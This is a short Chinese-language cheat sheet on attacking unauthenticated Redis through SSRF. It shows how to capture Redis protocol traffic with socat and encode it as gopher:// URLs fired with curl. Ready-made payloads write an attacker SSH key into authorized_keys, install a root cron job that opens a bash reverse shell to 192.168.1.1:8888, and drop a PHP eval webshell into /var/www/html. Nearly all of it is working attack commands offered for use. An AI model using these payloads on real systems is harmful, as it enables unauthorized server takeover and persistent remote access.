redis payload笔记
抓去流量的方法
1.安装redis与socat
2.启动redis,使用socat对redis的流量做一下转发
socat -v tcp-listen:4444,fork tcp-connect:127.0.1:6379
然后
redis-cli -p 4444
输入如下命令
flushall config set dir /home/redis/.ssh/ config set dbfilename authorized_keys set x "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDHyhpFBTKSSVTH4fsbK9ThbE0+5cZbrHS62B2AwAqHJ9+Xwcifkm4rRGVp1PMewaE0GsbDdkdd3MNTiH2xuDdhqXvFgZNrBza4E50Az5kuiZJSuROajo+BkLIQIRTSuNoSQ13+5tjyuUyJH/rkulVKteA5bJm4nE9/k62F+v6DIBzTs48gQWIIoSo4eYp5P9YhT7+Jp/pQ8qK9kJ0OROC5s2Kwbvx0VveBEtiATlh3sNgxpitq1ZKSfoQxEDSoz0Yc/xYyS7ZdOy3iGuNmXWxYhzQh2TIyMrRF9kOoQt819VDdx9rFxKd4mo0wWHBPYqByxhElDrkVtvq0iTIEWiAJ www-data@20823789636d" save
获取大致如下的流量
*1\r $8\r flushall\r < 2020/04/24 19:57:32.273053 length=5 from=0 to=4 +OK\r > 2020/04/24 19:57:38.830175 length=58 from=18 to=75 *4\r $6\r config\r $3\r set\r $3\r dir\r $17\r /home/redis/.ssh/\r < 2020/04/24 19:57:38.830886 length=5 from=5 to=9 +OK\r > 2020/04/24 19:57:44.688296 length=64 from=76 to=139 *4\r $6\r config\r $3\r set\r $10\r dbfilename\r $15\r authorized_keys\r < 2020/04/24 19:57:44.688847 length=5 from=10 to=14 +OK\r > 2020/04/24 19:57:51.586985 length=430 from=140 to=569 *3\r $3\r set\r $1\r x\r $402\r ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDHyhpFBTKSSVTH4fsbK9ThbE0+5cZbrHS62B2AwAqHJ9+Xwcifkm4rRGVp1PMewaE0GsbDdkdd3MNTiH2xuDdhqXvFgZNrBza4E50Az5kuiZJSuROajo+BkLIQIRTSuNoSQ13+5tjyuUyJH/rkulVKteA5bJm4nE9/k62F+v6DIBzTs48gQWIIoSo4eYp5P9YhT7+Jp/pQ8qK9kJ0OROC5s2Kwbvx0VveBEtiATlh3sNgxpitq1ZKSfoQxEDSoz0Yc/xYyS7ZdOy3iGuNmXWxYhzQh2TIyMrRF9kOoQt819VDdx9rFxKd4mo0wWHBPYqByxhElDrkVtvq0iTIEWiAJ www-data@20823789636d\r < 2020/04/24 19:57:51.588584 length=5 from=15 to=19 +OK\r > 2020/04/24 19:58:01.597515 length=14 from=570 to=583 *1\r $4\r save\r < 2020/04/24 19:58:01.600311 length=5 from=20 to=24 +OK\r
3.将多余部分删除,换行\r\n替换为%0d%0a,空格变为%20,大致处理为如下格式
*1%0d%0a$8%0d%0aflushall%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$17%0d%0a/home/redis/.ssh/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$15%0d%0aauthorized_keys%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0ax%0d%0a$402%0d%0assh-rsa%20AAAAB3NzaC1yc2EAAAADAQABAAABAQDHyhpFBTKSSVTH4fsbK9ThbE0+5cZbrHS62B2AwAqHJ9+Xwcifkm4rRGVp1PMewaE0GsbDdkdd3MNTiH2xuDdhqXvFgZNrBza4E50Az5kuiZJSuROajo+BkLIQIRTSuNoSQ13+5tjyuUyJH/rkulVKteA5bJm4nE9/k62F+v6DIBzTs48gQWIIoSo4eYp5P9YhT7+Jp/pQ8qK9kJ0OROC5s2Kwbvx0VveBEtiATlh3sNgxpitq1ZKSfoQxEDSoz0Yc/xYyS7ZdOy3iGuNmXWxYhzQh2TIyMrRF9kOoQt819VDdx9rFxKd4mo0wWHBPYqByxhElDrkVtvq0iTIEWiAJ%20www-data@20823789636d%0d%0a*1%0d%0a$4%0d%0asave%0d%0a
4.执行
curl -v "gopher://127.0.0.1:6379/*1%0d%0a$8%0d%0aflushall%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$17%0d%0a/home/redis/.ssh/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$15%0d%0aauthorized_keys%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0ax%0d%0a$402%0d%0assh-rsa%20AAAAB3NzaC1yc2EAAAADAQABAAABAQDHyhpFBTKSSVTH4fsbK9ThbE0+5cZbrHS62B2AwAqHJ9+Xwcifkm4rRGVp1PMewaE0GsbDdkdd3MNTiH2xuDdhqXvFgZNrBza4E50Az5kuiZJSuROajo+BkLIQIRTSuNoSQ13+5tjyuUyJH/rkulVKteA5bJm4nE9/k62F+v6DIBzTs48gQWIIoSo4eYp5P9YhT7+Jp/pQ8qK9kJ0OROC5s2Kwbvx0VveBEtiATlh3sNgxpitq1ZKSfoQxEDSoz0Yc/xYyS7ZdOy3iGuNmXWxYhzQh2TIyMrRF9kOoQt819VDdx9rFxKd4mo0wWHBPYqByxhElDrkVtvq0iTIEWiAJ%20www-data@20823789636d%0d%0a*1%0d%0a$4%0d%0asave%0d%0a "
写计划任务
命令行
flushall set x "\n* * * * * bash -i >& /dev/tcp/192.168.1.1/8888 0>&1\n" config set dir /var/spool/cron/ config set dbfilename root save
gopher
curl -v "gopher://127.0.0.1:6379/_*1%0d%0a\$8%0d%0aflushall%0d%0a*3%0d%0a\$3%0d%0aset%0d%0a\$1%0d%0a1%0d%0a\$64%0d%0a%0d%0a%0a%0a*/1* * * * bash -i >&/dev/tcp/192.168.1.1/8888>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a\$6%0d%0aconfig%0d%0a\$3%0d%0aset%0d%0a\$3%0d%0adir%0d%0a\$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a\$6%0d%0aconfig%0d%0a\$3%0d%0aset%0d%0a\$10%0d%0adbfilename%0d%0a\$4%0d%0aroot%0d%0a*1%0d%0a\$4%0d%0asave%0d%0aquit%0d%0a"
写webshell
命令行
flushall set x "<?php eval($_POST[c]);?>" config set dir /var/www/html config set dbfilename shell.php save
gopher
gopher://127.0.0.1:6379/_*1%0d%0a\$8%0d%0aflushall%0d%0a*3%0d%0a\$3%0d%0aset%0d%0a\$1%0d%0ax%0d%0a\$25%0d%0a%3C%3Fphp%20%40eval(%24_POST%5Bc%5D)%3B%3F%3E%0d%0a*4%0d%0a\$6%0d%0aconfig%0d%0a\$3%0d%0aset%0d%0a\$3%0d%0adir%0d%0a\$13%0d%0a/var/www/html%0d%0a*4%0d%0a\$6%0d%0aconfig%0d%0a\$3%0d%0aset%0d%0a\$10%0d%0adbfilename%0d%0a\$9%0d%0ashell.php%0d%0a*1%0d%0a\$4%0d%0asave%0d%0a